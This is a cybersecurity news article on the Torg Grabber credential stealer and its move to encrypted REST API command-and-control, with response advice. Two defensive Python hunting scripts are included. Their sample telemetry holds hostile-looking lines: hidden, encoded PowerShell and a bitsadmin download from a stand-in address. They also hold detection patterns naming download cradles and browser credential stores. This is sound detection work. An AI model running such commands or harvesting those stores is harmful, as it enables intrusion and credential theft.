The CISO Brief
Cybercrime and Ransomware

New Torg Grabber Stealer Shifts from Telegram to Encrypted REST API C2

By Staff Writer, March 26, 2026

Fast Facts

  1. Torg Grabber, a rapidly evolving credential stealer, transitioned from Telegram-based exfiltration to a sophisticated, encrypted REST API command-and-control infrastructure within three months, serving multiple criminal clients.
  2. The malware targets over 30 browser types and collects sensitive information like credentials, browser extensions, session data, VPN configs, and screenshots, indicating a wide data-harvesting scope.
  3. It employs a multi-stage loader chain—initial dropper via fake software or cheats, followed by in-memory, diskless PE payloads using custom syscalls and AES encryption—making detection difficult.
  4. Investigators advise against installing software from unofficial sources and recommend monitoring for suspicious PowerShell activity, BITS transfers, in-memory (fileless) execution patterns and irregular browser behavior to catch an infection early.

What’s the Problem?

A newly identified credential stealer called Torg Grabber has evolved rapidly over about three months, moving from simple data exfiltration through Telegram to an encrypted REST API command-and-control (C2) infrastructure. It came to light when a sample initially mistaken for Vidar Stealer was analyzed and found to have its own characteristics, including a custom C2 protocol that uses ChaCha20 for encryption and HMAC-SHA256 for message authentication. The malware harvests credentials and data from a broad range of browsers, cryptocurrency wallets and messaging platforms. Its trajectory points to an organized operation serving multiple clients: at least 40 operator tags have been observed, linked to Russian-speaking networks. Delivery runs through a multi-stage loader chain of fake software, PowerShell scripts, encrypted payloads and in-memory execution, which keeps the final payload off disk and complicates detection. Security experts therefore recommend avoiding downloads from unofficial sources and watching for suspicious PowerShell commands, in-memory execution patterns, changes to browser security settings and other host anomalies.

This report comes from Gen Digital’s Threat Research Team, who analyzed the malware’s binary and detailed its evolution, infrastructure, and operational tactics. They emphasize that the malware’s advancement stems from deliberate development to evade detection and broaden its reach, which explains its adoption of encrypted communications and in-memory payloads. The team notes that multiple criminal actors are operating Torg Grabber, leveraging its scalable architecture to serve diverse illicit purposes. As a result, cybersecurity professionals are urged to reinforce endpoint security measures and remain alert to signs of compromise, especially when dealing with high-value credential theft and targeted credential exfiltration schemes.

Risks Involved

The shift described in ‘New Torg Grabber Stealer Moves From Telegram Exfiltration to Encrypted REST API C2’ is a practical problem for defenders, not just a technical curiosity. Exfiltration through Telegram depends on a fixed third-party service, which a proxy or DNS policy can block outright. A self-hosted REST API offers no such single choke point, and because the C2 protocol carries its own ChaCha20 encryption and HMAC-SHA256 authentication at the application layer, even a proxy that terminates TLS sees only opaque bytes. Data transfers therefore become harder to detect and block on content alone. Stolen customer data, financial information, credentials or proprietary business details can leave the environment without anyone noticing, and the consequences follow: financial loss, legal and regulatory penalties, and reputational damage. Left unchecked, an infection of this kind disrupts operations and erodes trust, which makes a response plan an immediate priority for any business.

Possible Action Plan

Timely response limits the damage an infection can do once Torg Grabber's loader chain has run and the host is talking to its encrypted REST API command-and-control (C2) channel rather than to Telegram. Prompt action can stop credential theft in progress, reduce operational disruption and keep the malware from spreading to further hosts.

Detection and Analysis

  • Conduct thorough threat intelligence gathering to understand the malware’s communication patterns.
  • Use network monitoring tools to identify unusual outbound traffic, especially to known malicious endpoints or encrypted channels.
  • Perform forensic analysis on affected systems to identify indicators of compromise (IOCs).
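The host-side indicators named in the Fast Facts (hidden or encoded PowerShell, BITS transfers, in-memory execution, browser credential stores touched by the wrong process) can be turned into a small hunting script for the detection step above. The following is an added example, not code from the article or from Gen Digital's analysis. The telemetry records, field names, rule names and thresholds are all assumptions: the sample events are constructed to resemble Sysmon process-creation, file-access and remote-thread data, and the staging-directory and credential-store path lists are illustrative, not a complete signature set.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry, loosely modelled on Sysmon fields (Image,
# ParentImage, CommandLine, TargetFilename, TargetImage). Every record below is
# made up for this example; none of it comes from the Gen Digital analysis.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # A "cheat" installer from Downloads spawning hidden, encoded PowerShell.
    {"id": 2, "type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\alice\Downloads\GameCheat_Setup.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4A"},
    # Next stage fetched with BITS into %TEMP%.
    {"id": 3, "type": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal "
                r"http://203.0.113.10/u.bin C:\Users\alice\AppData\Local\Temp\u.bin"},
    # An unknown binary reads the Chromium password store.
    {"id": 4, "type": "file_access", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # The real browser reading its own store: benign.
    {"id": 5, "type": "file_access",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # PowerShell creating a thread in another process: in-memory loader behaviour.
    {"id": 6, "type": "remote_thread",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\System32\svchost.exe"},
    # Ordinary admin PowerShell with a single flag: must not fire.
    {"id": 7, "type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -nop Get-ChildItem C:\logs"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
BROWSER_INSTALL_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")
CRED_STORES = ("\\login data", "\\local state", "\\cookies",
               "logins.json", "key4.db", "cookies.sqlite")
STAGING_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")

# Each pattern is one dropper-like trait; two or more together raise an alert,
# so a lone -nop in an admin's command line stays quiet.
PS_TRAITS = [re.compile(p, re.I) for p in (
    r"-(encodedcommand|enc|ec|e)\b",
    r"-(noprofile|nop)\b",
    r"-w(indowstyle)?\s+hidden\b",
    r"-e(xecutionpolicy|p)\s+bypass\b",
    r"\biex\b|invoke-expression",
    r"downloadstring|downloadfile|frombase64string|invoke-webrequest",
)]


def basename(path):
    return PureWindowsPath(path).name.lower()


def check_powershell(ev):
    """Hidden/encoded PowerShell, and PowerShell spawned from a staging directory."""
    if ev["type"] != "process_create" or basename(ev["image"]) not in POWERSHELL:
        return []
    hits = []
    if sum(1 for p in PS_TRAITS if p.search(ev["cmdline"])) >= 2:
        hits.append("suspicious_powershell")
    if any(d in ev.get("parent", "").lower() for d in STAGING_DIRS):
        hits.append("powershell_from_staging_dir")
    return hits


def check_bits(ev):
    """BITS used as a download cradle from a command line."""
    if ev["type"] != "process_create":
        return []
    c = ev["cmdline"].lower()
    return ["bits_transfer"] if ("bitsadmin" in c and "/transfer" in c) \
        or "start-bitstransfer" in c else []


def check_browser_store(ev):
    """Credential/cookie store opened by anything but the installed browser."""
    if ev["type"] != "file_access" or not any(s in ev["target"].lower() for s in CRED_STORES):
        return []
    image = ev["image"].lower()
    # A lookalike chrome.exe dropped in %TEMP% does not live under Program Files.
    legit = basename(image) in BROWSERS and image.startswith(BROWSER_INSTALL_ROOTS)
    return [] if legit else ["browser_store_access_by_nonbrowser"]


def check_remote_thread(ev):
    """Script host injecting into another process: in-memory payload staging."""
    if ev["type"] != "remote_thread" or basename(ev["image"]) not in SCRIPT_HOSTS:
        return []
    return ["script_host_remote_thread"]


CHECKS = (check_powershell, check_bits, check_browser_store, check_remote_thread)


def hunt(events):
    """Return (rule, event_id) pairs; feed it your own parsed telemetry in the same shape."""
    return [(rule, ev["id"]) for ev in events for check in CHECKS for rule in check(ev)]


def chain_score(findings):
    """Number of distinct rules fired; a loader chain like the one described trips several."""
    return len({rule for rule, _ in findings})


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for rule, eid in found:
        print(f"{rule:36s} event {eid}")
    print("distinct rules fired:", chain_score(found))
```

Any one rule will produce noise on a real fleet (administrators run encoded PowerShell too); the useful signal is several rules firing on the same host in a short window, which is what `chain_score` approximates. Swap the constructed `SAMPLE_EVENTS` for records parsed from your EDR or Sysmon export and keep the path allowlists in step with how browsers are actually installed in your environment.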

Containment

  • Isolate infected devices from the network to stop ongoing data exfiltration.
  • Disable or block communication with malicious C2 servers and suspicious APIs at network perimeter devices like firewalls and proxies.

Mitigation

  • Apply all relevant security patches and updates to vulnerable systems and applications.
  • Implement strong access controls and enforce multi-factor authentication to limit what stolen passwords are worth; note that the stealer also collects session data, so an attacker holding a valid session token can bypass MFA until that session is revoked.
  • Configure intrusion detection and prevention systems (IDPS) to recognize and block known malicious signatures and behaviors.

Remediation

  • Remove malware and related artifacts from impacted systems through careful cleanup procedures.
  • Reset credentials, revoke active sessions and tokens for affected users (stolen session data stays valid after a password change), and regenerate encryption keys if necessary to eliminate hidden access points.
  • Restore systems from clean backups, verifying integrity before bringing them back online.

Enhancement & Monitoring

  • Strengthen security posture with updated firewall and intrusion rules. TLS inspection alone will not expose the C2 content, which is separately encrypted with ChaCha20, so focus on connection metadata: destination reputation, beacon timing, request sizes and hosts contacted by only one process.
  • Deploy or update endpoint detection and response (EDR) solutions to monitor for future malicious activity.
  • Continuously review logs and threat intelligence feeds for emerging indicators related to the threat actor’s tactics.
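Because the C2 payload is encrypted at the application layer, the network-monitoring step under Detection and Analysis and the encrypted-traffic point above both come down to metadata. The following is an added example, not code from the article or from Gen Digital, showing beacon-style analysis over proxy logs: for each client/destination pair it measures how regular the inter-request gaps and request sizes are, and flags POSTs to bare IP addresses. The log format, the thresholds and the destination 203.0.113.10 (an RFC 5737 test address standing in for a hypothetical REST C2) are all assumptions; nothing here is a known Torg Grabber indicator.

```python
import statistics
from datetime import datetime
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed proxy log, one request per line:
#   <iso8601 time> <client ip> <method> <url> <status> <bytes>
# Made up for this example; it is not traffic from the Gen Digital analysis.
# The roughly-every-60-seconds POSTs to 203.0.113.10 play the hypothetical C2;
# the www.example.com requests are ordinary bursty browsing.
SAMPLE_LOG = """\
2026-03-26T10:00:00Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 512
2026-03-26T10:00:05Z 10.0.0.5 GET https://www.example.com/ 200 14022
2026-03-26T10:00:07Z 10.0.0.5 GET https://www.example.com/style.css 200 3301
2026-03-26T10:00:30Z 10.0.0.5 GET https://www.example.com/news 200 22410
2026-03-26T10:01:02Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 508
2026-03-26T10:01:59Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 515
2026-03-26T10:02:10Z 10.0.0.5 GET https://www.example.com/article/42 200 18877
2026-03-26T10:02:11Z 10.0.0.5 GET https://www.example.com/img/42.png 200 90112
2026-03-26T10:03:01Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 511
2026-03-26T10:04:00Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 509
2026-03-26T10:04:58Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 513
2026-03-26T10:05:40Z 10.0.0.5 GET https://www.example.com/about 200 7700
2026-03-26T10:06:01Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 510
2026-03-26T10:07:00Z 10.0.0.5 POST https://203.0.113.10/api/v1/report 200 514
2026-03-26T10:09:00Z 10.0.0.5 GET https://www.example.com/ 200 14022
"""

MIN_REQUESTS = 6   # below this, interval statistics are meaningless (assumed threshold)
MAX_GAP_CV = 0.2   # coefficient of variation of inter-request gaps (assumed threshold)
MAX_SIZE_CV = 0.1  # coefficient of variation of request sizes (assumed threshold)


def parse(log_text):
    """Split the constructed log format into dicts with a parsed timestamp and host."""
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, size = line.split()
        rows.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "client": client, "method": method,
            "host": urlsplit(url).hostname, "path": urlsplit(url).path,
            "status": int(status), "bytes": int(size),
        })
    return rows


def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def coefficient_of_variation(values):
    """Standard deviation relative to the mean: near 0 means machine-regular."""
    mean = statistics.fmean(values)
    return statistics.pstdev(values) / mean if mean else float("inf")


def hunt(rows):
    """Return {(client, host): [rules...]} for pairs that look like beaconing."""
    by_pair = {}
    for r in rows:
        by_pair.setdefault((r["client"], r["host"]), []).append(r)
    findings = {}
    for pair, reqs in by_pair.items():
        reqs.sort(key=lambda r: r["ts"])
        rules = []
        if len(reqs) >= MIN_REQUESTS:
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
            if coefficient_of_variation(gaps) < MAX_GAP_CV:
                rules.append("periodic_beacon")
            if coefficient_of_variation([r["bytes"] for r in reqs]) < MAX_SIZE_CV:
                rules.append("uniform_request_size")
        if any(r["method"] == "POST" for r in reqs) and is_ip_literal(pair[1]):
            rules.append("post_to_ip_literal")
        if rules:
            findings[pair] = rules
    return findings


if __name__ == "__main__":
    for (client, host), rules in hunt(parse(SAMPLE_LOG)).items():
        print(f"{client} -> {host}: {', '.join(rules)}")
```

Timing regularity survives any amount of payload encryption, which is why it is worth more here than signatures on request bodies. Operators can add jitter or sleep windows, so treat a low coefficient of variation as a lead for the forensic step rather than proof, and extend the grouping key with the originating process once you have proxy logs that carry it. This only works where outbound HTTP(S) actually traverses a logging proxy; hosts that bypass it need flow or DNS logs instead.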

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Related Posts

CISA Alerts on Critical Langflow Code Injection Attacks

March 26, 2026

Stryker Uncovers Non-Propagating Ransomware Threat Actor

March 26, 2026

Critical Vulnerability: Remote Attackers Can Execute Arbitrary Commands via Synology DiskStation Manager

March 26, 2026

Comments are closed.

Latest Posts

CISA Alerts on Critical Langflow Code Injection Attacks

March 26, 2026

New Torg Grabber Stealer Shifts from Telegram to Encrypted REST API C2

March 26, 2026

Stryker Uncovers Non-Propagating Ransomware Threat Actor

March 26, 2026

Critical Vulnerability: Remote Attackers Can Execute Arbitrary Commands via Synology DiskStation Manager

March 26, 2026
Don't Miss

CISA Alerts on Critical Langflow Code Injection Attacks

By Staff WriterMarch 26, 2026

Quick Takeaways The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical, actively exploited…

Stryker Uncovers Non-Propagating Ransomware Threat Actor

March 26, 2026

Critical Vulnerability: Remote Attackers Can Execute Arbitrary Commands via Synology DiskStation Manager

March 26, 2026

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Recent Posts

  • CISA Alerts on Critical Langflow Code Injection Attacks
  • New Torg Grabber Stealer Shifts from Telegram to Encrypted REST API C2
  • Stryker Uncovers Non-Propagating Ransomware Threat Actor
  • Critical Vulnerability: Remote Attackers Can Execute Arbitrary Commands via Synology DiskStation Manager
  • Critical Firewall Vulnerability Enables Remote Root Code Execution
About Us
About Us

Welcome to The CISO Brief, your trusted source for the latest news, expert insights, and developments in the cybersecurity world.

In today’s rapidly evolving digital landscape, staying informed about cyber threats, innovations, and industry trends is critical for professionals and organizations alike. At The CISO Brief, we are committed to providing timely, accurate, and insightful content that helps security leaders navigate the complexities of cybersecurity.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

CISA Alerts on Critical Langflow Code Injection Attacks

March 26, 2026

New Torg Grabber Stealer Shifts from Telegram to Encrypted REST API C2

March 26, 2026

Stryker Uncovers Non-Propagating Ransomware Threat Actor

March 26, 2026
Most Popular

Protecting MCP Security: Defeating Prompt Injection & Tool Poisoning

January 30, 202629 Views

The New Face of DDoS is Impacted by AI

August 4, 202523 Views

Absolute Launches GenAI Tools to Tackle Endpoint Risk

August 7, 202515 Views

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025

Categories

  • Compliance
  • Cyber Updates
  • Cybercrime and Ransomware
  • Editor's pick
  • Emerging Tech
  • Events
  • Featured
  • Insights
  • Threat Intelligence
  • Uncategorized
© 2026 thecisobrief. Designed by thecisobrief.
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions

Type above and press Enter to search. Press Esc to cancel.